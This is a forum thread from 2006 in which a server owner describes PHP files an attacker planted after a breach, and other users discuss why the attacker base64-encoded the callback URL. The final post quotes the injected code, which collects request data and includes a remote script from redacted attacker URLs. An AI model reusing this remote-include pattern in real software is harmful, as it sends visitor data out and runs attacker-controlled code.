Page 1 of 1

A Q about someone's code injection..

Posted: Wed Jan 11, 2006 3:00 am
by Jenk
Recently a server that I did some work on was breached and two PHP files added to a directory.

The contents of these files were different but both completed the same task - they gathered various $_SERVER info and then included from a russian url with the info in the get var's.

Anyway - the one thing that struck me was the script kiddies use of base64_encode() to 'mask' the url?!

The last bit puzzled me somewhat.. was this a weak attempt at obscurification, or is there some other reason (perhaps fooling include/require/php into thinking it is not actually including over http - not likely I would have thought) ?

Posted: Wed Jan 11, 2006 5:19 am
by Buddha443556
Maybe the url has become the signature for the exploit and the base64 encoding is just an attempt to hide that signature? That's reaching pretty far though. Probably just trying to hide the url from your average Fantastico user who has zero programming experience.

Posted: Wed Jan 11, 2006 6:19 am
by Maugrim_The_Reaper
What does base64_decode() say? Its likely just an obscuration measure - base64 isn't all that hard to decode. Also makes it easier to pass some data without being affected by url encodings.

Posted: Wed Jan 11, 2006 7:08 am
by Jenk
It's the url to a ruski site along with the info collected from $_SERVER, this is what was injected into one of the files, nothing malicious here, but obviously we don't know what is in the include's:

Code: Select all

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode(/* removed */).base64_decode(/* removed */)."/?".$str))){} else {include(base64_decode(/* removed */).base64_decode(/* removed */)."/?".$str);} ?>
Where /* removed */ was the url broken into two and 64 encoded. (The if challenge has two different URL's)